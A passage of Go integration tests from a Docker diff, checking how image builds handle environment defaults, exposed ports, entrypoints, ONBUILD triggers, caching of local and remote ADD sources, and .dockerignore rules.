"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + + fn := func(dockerfile string, exp string) { + _, err := buildImage("testbldpath", dockerfile, true) + c.Assert(err, check.IsNil) + + res := inspectField(c, "testbldpath", "Config.Env") + + if res != exp { + c.Fatalf("Env %q, expected %q for dockerfile:%q", res, exp, dockerfile) + } + } + + tests := []struct{ dockerfile, exp string }{ + {"FROM scratch\nMAINTAINER me", "[PATH=" + defPath + "]"}, + {"FROM busybox\nMAINTAINER me", "[PATH=" + defPath + "]"}, + {"FROM scratch\nENV FOO=bar", "[PATH=" + defPath + " FOO=bar]"}, + {"FROM busybox\nENV FOO=bar", "[PATH=" + defPath + " FOO=bar]"}, + {"FROM scratch\nENV PATH=/test", "[PATH=/test]"}, + {"FROM busybox\nENV PATH=/test", "[PATH=/test]"}, + {"FROM scratch\nENV PATH=''", "[PATH=]"}, + {"FROM busybox\nENV PATH=''", "[PATH=]"}, + } + + for _, test := range tests { + fn(test.dockerfile, test.exp) + } +} + +func (s *DockerSuite) TestBuildContextCleanup(c *check.C) { + testRequires(c, SameHostDaemon) + + name := "testbuildcontextcleanup" + entries, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + if err != nil { + c.Fatalf("failed to list contents of tmp dir: %s", err) + } + _, err = buildImage(name, + `FROM `+minimalBaseImage()+` + ENTRYPOINT ["/bin/echo"]`, + true) + if err != nil { + c.Fatal(err) + } + entriesFinal, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + if err != nil { + c.Fatalf("failed to list contents of tmp dir: %s", err) + } + if err = compareDirectoryEntries(entries, entriesFinal); err != nil { + c.Fatalf("context should have been deleted, but wasn't") + } + +} + +func (s *DockerSuite) TestBuildContextCleanupFailedBuild(c *check.C) { + testRequires(c, SameHostDaemon) + + name := "testbuildcontextcleanup" + entries, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + if err != nil { + c.Fatalf("failed to list contents of tmp dir: %s", err) + } + _, err = buildImage(name, + `FROM `+minimalBaseImage()+` + RUN /non/existing/command`, + true) + if err == nil { + c.Fatalf("expected build to fail, but it didn't") + } + entriesFinal, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + if err != nil { + c.Fatalf("failed to list contents of tmp dir: %s", err) + } + if err = compareDirectoryEntries(entries, entriesFinal); err != nil { + c.Fatalf("context should have been deleted, but wasn't") + } + +} + +func (s *DockerSuite) TestBuildCmd(c *check.C) { + name := "testbuildcmd" + + expected := "[/bin/echo Hello World]" + _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + CMD ["/bin/echo", "Hello World"]`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Cmd") + if res != expected { + c.Fatalf("Cmd %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildExpose(c *check.C) { + testRequires(c, DaemonIsLinux) // Expose not implemented on Windows + name := "testbuildexpose" + expected := "map[2375/tcp:{}]" + _, err := buildImage(name, + `FROM scratch + EXPOSE 2375`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.ExposedPorts") + if res != expected { + c.Fatalf("Exposed ports %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildExposeMorePorts(c *check.C) { + testRequires(c, DaemonIsLinux) // Expose not implemented on Windows + // start building docker file with a large number of ports + portList := make([]string, 50) + line := make([]string, 100) + expectedPorts := make([]int, len(portList)*len(line)) + for i := 0; i < len(portList); i++ { + for j := 0; j < len(line); j++ { + p := i*len(line) + j + 1 + line[j] = strconv.Itoa(p) + expectedPorts[p-1] = p + } + if i == len(portList)-1 { + portList[i] = strings.Join(line, " ") + } else { + portList[i] = strings.Join(line, " ") + ` \` + } + } + + dockerfile := `FROM scratch + EXPOSE {{range .}} {{.}} + {{end}}` + tmpl := template.Must(template.New("dockerfile").Parse(dockerfile)) + buf := bytes.NewBuffer(nil) + tmpl.Execute(buf, portList) + + name := "testbuildexpose" + _, err := buildImage(name, buf.String(), true) + if err != nil { + c.Fatal(err) + } + + // check if all the ports are saved inside Config.ExposedPorts + res := inspectFieldJSON(c, name, "Config.ExposedPorts") + var exposedPorts map[string]interface{} + if err := json.Unmarshal([]byte(res), &exposedPorts); err != nil { + c.Fatal(err) + } + + for _, p := range expectedPorts { + ep := fmt.Sprintf("%d/tcp", p) + if _, ok := exposedPorts[ep]; !ok { + c.Errorf("Port(%s) is not exposed", ep) + } else { + delete(exposedPorts, ep) + } + } + if len(exposedPorts) != 0 { + c.Errorf("Unexpected extra exposed ports %v", exposedPorts) + } +} + +func (s *DockerSuite) TestBuildExposeOrder(c *check.C) { + testRequires(c, DaemonIsLinux) // Expose not implemented on Windows + buildID := func(name, exposed string) string { + _, err := buildImage(name, fmt.Sprintf(`FROM scratch + EXPOSE %s`, exposed), true) + if err != nil { + c.Fatal(err) + } + id := inspectField(c, name, "Id") + return id + } + + id1 := buildID("testbuildexpose1", "80 2375") + id2 := buildID("testbuildexpose2", "2375 80") + if id1 != id2 { + c.Errorf("EXPOSE should invalidate the cache only when ports actually changed") + } +} + +func (s *DockerSuite) TestBuildExposeUpperCaseProto(c *check.C) { + testRequires(c, DaemonIsLinux) // Expose not implemented on Windows + name := "testbuildexposeuppercaseproto" + expected := "map[5678/udp:{}]" + _, err := buildImage(name, + `FROM scratch + EXPOSE 5678/UDP`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.ExposedPorts") + if res != expected { + c.Fatalf("Exposed ports %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildEmptyEntrypointInheritance(c *check.C) { + name := "testbuildentrypointinheritance" + name2 := "testbuildentrypointinheritance2" + + _, err := buildImage(name, + `FROM busybox + ENTRYPOINT ["/bin/echo"]`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Entrypoint") + + expected := "[/bin/echo]" + if res != expected { + c.Fatalf("Entrypoint %s, expected %s", res, expected) + } + + _, err = buildImage(name2, + fmt.Sprintf(`FROM %s + ENTRYPOINT []`, name), + true) + if err != nil { + c.Fatal(err) + } + res = inspectField(c, name2, "Config.Entrypoint") + + expected = "[]" + + if res != expected { + c.Fatalf("Entrypoint %s, expected %s", res, expected) + } + +} + +func (s *DockerSuite) TestBuildEmptyEntrypoint(c *check.C) { + name := "testbuildentrypoint" + expected := "[]" + + _, err := buildImage(name, + `FROM busybox + ENTRYPOINT []`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Entrypoint") + if res != expected { + c.Fatalf("Entrypoint %s, expected %s", res, expected) + } + +} + +func (s *DockerSuite) TestBuildEntrypoint(c *check.C) { + name := "testbuildentrypoint" + + expected := "[/bin/echo]" + _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + ENTRYPOINT ["/bin/echo"]`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Entrypoint") + if res != expected { + c.Fatalf("Entrypoint %s, expected %s", res, expected) + } + +} + +// #6445 ensure ONBUILD triggers aren't committed to grandchildren +func (s *DockerSuite) TestBuildOnBuildLimitedInheritence(c *check.C) { + var ( + out2, out3 string + ) + { + name1 := "testonbuildtrigger1" + dockerfile1 := ` + FROM busybox + RUN echo "GRANDPARENT" + ONBUILD RUN echo "ONBUILD PARENT" + ` + ctx, err := fakeContext(dockerfile1, nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out1, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", name1, ".") + if err != nil { + c.Fatalf("build failed to complete: %s, %v", out1, err) + } + } + { + name2 := "testonbuildtrigger2" + dockerfile2 := ` + FROM testonbuildtrigger1 + ` + ctx, err := fakeContext(dockerfile2, nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out2, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-t", name2, ".") + if err != nil { + c.Fatalf("build failed to complete: %s, %v", out2, err) + } + } + { + name3 := "testonbuildtrigger3" + dockerfile3 := ` + FROM testonbuildtrigger2 + ` + ctx, err := fakeContext(dockerfile3, nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out3, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-t", name3, ".") + if err != nil { + c.Fatalf("build failed to complete: %s, %v", out3, err) + } + + } + + // ONBUILD should be run in second build. + if !strings.Contains(out2, "ONBUILD PARENT") { + c.Fatalf("ONBUILD instruction did not run in child of ONBUILD parent") + } + + // ONBUILD should *not* be run in third build. + if strings.Contains(out3, "ONBUILD PARENT") { + c.Fatalf("ONBUILD instruction ran in grandchild of ONBUILD parent") + } + +} + +func (s *DockerSuite) TestBuildWithCache(c *check.C) { + testRequires(c, DaemonIsLinux) // Expose not implemented on Windows + name := "testbuildwithcache" + id1, err := buildImage(name, + `FROM scratch + MAINTAINER dockerio + EXPOSE 5432 + ENTRYPOINT ["/bin/echo"]`, + true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImage(name, + `FROM scratch + MAINTAINER dockerio + EXPOSE 5432 + ENTRYPOINT ["/bin/echo"]`, + true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but hasn't.") + } +} + +func (s *DockerSuite) TestBuildWithoutCache(c *check.C) { + testRequires(c, DaemonIsLinux) // Expose not implemented on Windows + name := "testbuildwithoutcache" + name2 := "testbuildwithoutcache2" + id1, err := buildImage(name, + `FROM scratch + MAINTAINER dockerio + EXPOSE 5432 + ENTRYPOINT ["/bin/echo"]`, + true) + if err != nil { + c.Fatal(err) + } + + id2, err := buildImage(name2, + `FROM scratch + MAINTAINER dockerio + EXPOSE 5432 + ENTRYPOINT ["/bin/echo"]`, + false) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("The cache should have been invalided but hasn't.") + } +} + +func (s *DockerSuite) TestBuildConditionalCache(c *check.C) { + name := "testbuildconditionalcache" + + dockerfile := ` + FROM busybox + ADD foo /tmp/` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatalf("Error building #1: %s", err) + } + + if err := ctx.Add("foo", "bye"); err != nil { + c.Fatalf("Error modifying foo: %s", err) + } + + id2, err := buildImageFromContext(name, ctx, false) + if err != nil { + c.Fatalf("Error building #2: %s", err) + } + if id2 == id1 { + c.Fatal("Should not have used the cache") + } + + id3, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatalf("Error building #3: %s", err) + } + if id3 != id2 { + c.Fatal("Should have used the cache") + } +} + +func (s *DockerSuite) TestBuildAddLocalFileWithCache(c *check.C) { + // local files are not owned by the correct user + testRequires(c, NotUserNamespace) + name := "testbuildaddlocalfilewithcache" + name2 := "testbuildaddlocalfilewithcache2" + dockerfile := ` + FROM busybox + MAINTAINER dockerio + ADD foo /usr/lib/bla/bar + RUN sh -c "[ $(cat /usr/lib/bla/bar) = "hello" ]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but hasn't.") + } +} + +func (s *DockerSuite) TestBuildAddMultipleLocalFileWithCache(c *check.C) { + name := "testbuildaddmultiplelocalfilewithcache" + name2 := "testbuildaddmultiplelocalfilewithcache2" + dockerfile := ` + FROM busybox + MAINTAINER dockerio + ADD foo Dockerfile /usr/lib/bla/ + RUN sh -c "[ $(cat /usr/lib/bla/foo) = "hello" ]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but hasn't.") + } +} + +func (s *DockerSuite) TestBuildAddLocalFileWithoutCache(c *check.C) { + // local files are not owned by the correct user + testRequires(c, NotUserNamespace) + name := "testbuildaddlocalfilewithoutcache" + name2 := "testbuildaddlocalfilewithoutcache2" + dockerfile := ` + FROM busybox + MAINTAINER dockerio + ADD foo /usr/lib/bla/bar + RUN sh -c "[ $(cat /usr/lib/bla/bar) = "hello" ]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, false) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("The cache should have been invalided but hasn't.") + } +} + +func (s *DockerSuite) TestBuildCopyDirButNotFile(c *check.C) { + name := "testbuildcopydirbutnotfile" + name2 := "testbuildcopydirbutnotfile2" + + dockerfile := ` + FROM ` + minimalBaseImage() + ` + COPY dir /tmp/` + ctx, err := fakeContext(dockerfile, map[string]string{ + "dir/foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + // Check that adding file with similar name doesn't mess with cache + if err := ctx.Add("dir_file", "hello2"); err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but wasn't") + } +} + +func (s *DockerSuite) TestBuildAddCurrentDirWithCache(c *check.C) { + name := "testbuildaddcurrentdirwithcache" + name2 := name + "2" + name3 := name + "3" + name4 := name + "4" + dockerfile := ` + FROM ` + minimalBaseImage() + ` + MAINTAINER dockerio + ADD . /usr/lib/bla` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + // Check that adding file invalidate cache of "ADD ." + if err := ctx.Add("bar", "hello2"); err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("The cache should have been invalided but hasn't.") + } + // Check that changing file invalidate cache of "ADD ." + if err := ctx.Add("foo", "hello1"); err != nil { + c.Fatal(err) + } + id3, err := buildImageFromContext(name3, ctx, true) + if err != nil { + c.Fatal(err) + } + if id2 == id3 { + c.Fatal("The cache should have been invalided but hasn't.") + } + // Check that changing file to same content with different mtime does not + // invalidate cache of "ADD ." + time.Sleep(1 * time.Second) // wait second because of mtime precision + if err := ctx.Add("foo", "hello1"); err != nil { + c.Fatal(err) + } + id4, err := buildImageFromContext(name4, ctx, true) + if err != nil { + c.Fatal(err) + } + if id3 != id4 { + c.Fatal("The cache should have been used but hasn't.") + } +} + +func (s *DockerSuite) TestBuildAddCurrentDirWithoutCache(c *check.C) { + name := "testbuildaddcurrentdirwithoutcache" + name2 := "testbuildaddcurrentdirwithoutcache2" + dockerfile := ` + FROM ` + minimalBaseImage() + ` + MAINTAINER dockerio + ADD . /usr/lib/bla` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, false) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("The cache should have been invalided but hasn't.") + } +} + +func (s *DockerSuite) TestBuildAddRemoteFileWithCache(c *check.C) { + name := "testbuildaddremotefilewithcache" + server, err := fakeStorage(map[string]string{ + "baz": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + id1, err := buildImage(name, + fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD %s/baz /usr/lib/baz/quux`, server.URL()), + true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImage(name, + fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD %s/baz /usr/lib/baz/quux`, server.URL()), + true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but hasn't.") + } +} + +func (s *DockerSuite) TestBuildAddRemoteFileWithoutCache(c *check.C) { + name := "testbuildaddremotefilewithoutcache" + name2 := "testbuildaddremotefilewithoutcache2" + server, err := fakeStorage(map[string]string{ + "baz": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + id1, err := buildImage(name, + fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD %s/baz /usr/lib/baz/quux`, server.URL()), + true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImage(name2, + fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD %s/baz /usr/lib/baz/quux`, server.URL()), + false) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("The cache should have been invalided but hasn't.") + } +} + +func (s *DockerSuite) TestBuildAddRemoteFileMTime(c *check.C) { + name := "testbuildaddremotefilemtime" + name2 := name + "2" + name3 := name + "3" + + files := map[string]string{"baz": "hello"} + server, err := fakeStorage(files) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD %s/baz /usr/lib/baz/quux`, server.URL()), nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + + id2, err := buildImageFromContext(name2, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but wasn't - #1") + } + + // Now create a different server with same contents (causes different mtime) + // The cache should still be used + + // allow some time for clock to pass as mtime precision is only 1s + time.Sleep(2 * time.Second) + + server2, err := fakeStorage(files) + if err != nil { + c.Fatal(err) + } + defer server2.Close() + + ctx2, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD %s/baz /usr/lib/baz/quux`, server2.URL()), nil) + if err != nil { + c.Fatal(err) + } + defer ctx2.Close() + id3, err := buildImageFromContext(name3, ctx2, true) + if err != nil { + c.Fatal(err) + } + if id1 != id3 { + c.Fatal("The cache should have been used but wasn't") + } +} + +func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithCache(c *check.C) { + name := "testbuildaddlocalandremotefilewithcache" + server, err := fakeStorage(map[string]string{ + "baz": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD foo /usr/lib/bla/bar + ADD %s/baz /usr/lib/baz/quux`, server.URL()), + map[string]string{ + "foo": "hello world", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but hasn't.") + } +} + +func testContextTar(c *check.C, compression archive.Compression) { + ctx, err := fakeContext( + `FROM busybox +ADD foo /foo +CMD ["cat", "/foo"]`, + map[string]string{ + "foo": "bar", + }, + ) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + context, err := archive.Tar(ctx.Dir, compression) + if err != nil { + c.Fatalf("failed to build context tar: %v", err) + } + name := "contexttar" + buildCmd := exec.Command(dockerBinary, "build", "-t", name, "-") + buildCmd.Stdin = context + + if out, _, err := runCommandWithOutput(buildCmd); err != nil { + c.Fatalf("build failed to complete: %v %v", out, err) + } +} + +func (s *DockerSuite) TestBuildContextTarGzip(c *check.C) { + testContextTar(c, archive.Gzip) +} + +func (s *DockerSuite) TestBuildContextTarNoCompression(c *check.C) { + testContextTar(c, archive.Uncompressed) +} + +func (s *DockerSuite) TestBuildNoContext(c *check.C) { + buildCmd := exec.Command(dockerBinary, "build", "-t", "nocontext", "-") + buildCmd.Stdin = strings.NewReader( + `FROM busybox + CMD ["echo", "ok"]`) + + if out, _, err := runCommandWithOutput(buildCmd); err != nil { + c.Fatalf("build failed to complete: %v %v", out, err) + } + + if out, _ := dockerCmd(c, "run", "--rm", "nocontext"); out != "ok\n" { + c.Fatalf("run produced invalid output: %q, expected %q", out, "ok") + } +} + +// TODO: TestCaching +func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithoutCache(c *check.C) { + name := "testbuildaddlocalandremotefilewithoutcache" + name2 := "testbuildaddlocalandremotefilewithoutcache2" + server, err := fakeStorage(map[string]string{ + "baz": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD foo /usr/lib/bla/bar + ADD %s/baz /usr/lib/baz/quux`, server.URL()), + map[string]string{ + "foo": "hello world", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, false) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("The cache should have been invalidated but hasn't.") + } +} + +func (s *DockerSuite) TestBuildWithVolumeOwnership(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildimg" + + _, err := buildImage(name, + `FROM busybox:latest + RUN mkdir /test && chown daemon:daemon /test && chmod 0600 /test + VOLUME /test`, + true) + + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--rm", "testbuildimg", "ls", "-la", "/test") + + if expected := "drw-------"; !strings.Contains(out, expected) { + c.Fatalf("expected %s received %s", expected, out) + } + + if expected := "daemon daemon"; !strings.Contains(out, expected) { + c.Fatalf("expected %s received %s", expected, out) + } + +} + +// testing #1405 - config.Cmd does not get cleaned up if +// utilizing cache +func (s *DockerSuite) TestBuildEntrypointRunCleanup(c *check.C) { + name := "testbuildcmdcleanup" + if _, err := buildImage(name, + `FROM busybox + RUN echo "hello"`, + true); err != nil { + c.Fatal(err) + } + + ctx, err := fakeContext(`FROM busybox + RUN echo "hello" + ADD foo /foo + ENTRYPOINT ["/bin/echo"]`, + map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Cmd") + // Cmd must be cleaned up + if res != "[]" { + c.Fatalf("Cmd %s, expected nil", res) + } +} + +func (s *DockerSuite) TestBuildAddFileNotFound(c *check.C) { + name := "testbuildaddnotfound" + expected := "foo: no such file or directory" + + if daemonPlatform == "windows" { + expected = "foo: The system cannot find the file specified" + } + + ctx, err := fakeContext(`FROM `+minimalBaseImage()+` + ADD foo /usr/local/bar`, + map[string]string{"bar": "hello"}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + if !strings.Contains(err.Error(), expected) { + c.Fatalf("Wrong error %v, must be about missing foo file or directory", err) + } + } else { + c.Fatal("Error must not be nil") + } +} + +func (s *DockerSuite) TestBuildInheritance(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildinheritance" + + _, err := buildImage(name, + `FROM scratch + EXPOSE 2375`, + true) + if err != nil { + c.Fatal(err) + } + ports1 := inspectField(c, name, "Config.ExposedPorts") + + _, err = buildImage(name, + fmt.Sprintf(`FROM %s + ENTRYPOINT ["/bin/echo"]`, name), + true) + if err != nil { + c.Fatal(err) + } + + res := inspectField(c, name, "Config.Entrypoint") + if expected := "[/bin/echo]"; res != expected { + c.Fatalf("Entrypoint %s, expected %s", res, expected) + } + ports2 := inspectField(c, name, "Config.ExposedPorts") + if ports1 != ports2 { + c.Fatalf("Ports must be same: %s != %s", ports1, ports2) + } +} + +func (s *DockerSuite) TestBuildFails(c *check.C) { + name := "testbuildfails" + _, err := buildImage(name, + `FROM busybox + RUN sh -c "exit 23"`, + true) + if err != nil { + if !strings.Contains(err.Error(), "returned a non-zero code: 23") { + c.Fatalf("Wrong error %v, must be about non-zero code 23", err) + } + } else { + c.Fatal("Error must not be nil") + } +} + +func (s *DockerSuite) TestBuildOnBuild(c *check.C) { + name := "testbuildonbuild" + _, err := buildImage(name, + `FROM busybox + ONBUILD RUN touch foobar`, + true) + if err != nil { + c.Fatal(err) + } + _, err = buildImage(name, + fmt.Sprintf(`FROM %s + RUN [ -f foobar ]`, name), + true) + if err != nil { + c.Fatal(err) + } +} + +// gh #2446 +func (s *DockerSuite) TestBuildAddToSymlinkDest(c *check.C) { + makeLink := `ln -s /foo /bar` + if daemonPlatform == "windows" { + makeLink = `mklink /D C:\bar C:\foo` + } + name := "testbuildaddtosymlinkdest" + ctx, err := fakeContext(`FROM busybox + RUN sh -c "mkdir /foo" + RUN `+makeLink+` + ADD foo /bar/ + RUN sh -c "[ -f /bar/foo ]" + RUN sh -c "[ -f /foo/foo ]"`, + map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildEscapeWhitespace(c *check.C) { + name := "testbuildescapewhitespace" + + _, err := buildImage(name, ` + # ESCAPE=\ + FROM busybox + MAINTAINER "Docker \ +IO " + `, true) + if err != nil { + c.Fatal(err) + } + + res := inspectField(c, name, "Author") + + if res != "\"Docker IO \"" { + c.Fatalf("Parsed string did not match the escaped string. Got: %q", res) + } + +} + +func (s *DockerSuite) TestBuildVerifyIntString(c *check.C) { + // Verify that strings that look like ints are still passed as strings + name := "testbuildstringing" + + _, err := buildImage(name, ` + FROM busybox + MAINTAINER 123 + `, true) + + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "inspect", name) + + if !strings.Contains(out, "\"123\"") { + c.Fatalf("Output does not contain the int as a string:\n%s", out) + } + +} + +func (s *DockerSuite) TestBuildDockerignore(c *check.C) { + name := "testbuilddockerignore" + dockerfile := ` + FROM busybox + ADD . /bla + RUN sh -c "[[ -f /bla/src/x.go ]]" + RUN sh -c "[[ -f /bla/Makefile ]]" + RUN sh -c "[[ ! -e /bla/src/_vendor ]]" + RUN sh -c "[[ ! -e /bla/.gitignore ]]" + RUN sh -c "[[ ! -e /bla/README.md ]]" + RUN sh -c "[[ ! -e /bla/dir/foo ]]" + RUN sh -c "[[ ! -e /bla/foo ]]" + RUN sh -c "[[ ! -e /bla/.git ]]" + RUN sh -c "[[ ! -e v.cc ]]" + RUN sh -c "[[ ! -e src/v.cc ]]" + RUN sh -c "[[ ! -e src/_vendor/v.cc ]]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Makefile": "all:", + ".git/HEAD": "ref: foo", + "src/x.go": "package main", + "src/_vendor/v.go": "package main", + "src/_vendor/v.cc": "package main", + "src/v.cc": "package main", + "v.cc": "package main", + "dir/foo": "", + ".gitignore": "", + "README.md": "readme", + ".dockerignore": ` +.git +pkg +.gitignore +src/_vendor +*.md +**/*.cc +dir`, + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildDockerignoreCleanPaths(c *check.C) { + name := "testbuilddockerignorecleanpaths" + dockerfile := ` + FROM busybox + ADD . /tmp/ + RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (! ls /tmp/dir1/foo)"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "foo", + "foo2": "foo2", + "dir1/foo": "foo in dir1", + ".dockerignore": "./foo\ndir1//foo\n./dir1/../foo2", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildDockerignoreExceptions(c *check.C) { + name := "testbuilddockerignoreexceptions" + dockerfile := ` + FROM busybox + ADD . /bla + RUN sh -c "[[ -f /bla/src/x.go ]]" + RUN sh -c "[[ -f /bla/Makefile ]]" + RUN sh -c "[[ ! -e /bla/src/_vendor ]]" + RUN sh -c "[[ ! -e /bla/.gitignore ]]" + RUN sh -c "[[ ! -e /bla/README.md ]]" + RUN sh -c "[[ -e /bla/dir/dir/foo ]]" + RUN sh -c "[[ ! -e /bla/dir/foo1 ]]" + RUN sh -c "[[ -f /bla/dir/e ]]" + RUN sh -c "[[ -f /bla/dir/e-dir/foo ]]" + RUN sh -c "[[ ! -e /bla/foo ]]" + RUN sh -c "[[ ! -e /bla/.git ]]" + RUN sh -c "[[ -e /bla/dir/a.cc ]]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Makefile": "all:", + ".git/HEAD": "ref: foo", + "src/x.go": "package main", + "src/_vendor/v.go": "package main", + "dir/foo": "", + "dir/foo1": "", + "dir/dir/f1": "", + "dir/dir/foo": "", + "dir/e": "", + "dir/e-dir/foo": "", + ".gitignore": "", + "README.md": "readme", + "dir/a.cc": "hello", + ".dockerignore": ` +.git +pkg +.gitignore +src/_vendor +*.md +dir +!dir/e* +!dir/dir/foo +**/*.cc +!**/*.cc`, + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildDockerignoringDockerfile(c *check.C) { + name := "testbuilddockerignoredockerfile" + dockerfile := ` + FROM busybox + ADD . /tmp/ + RUN sh 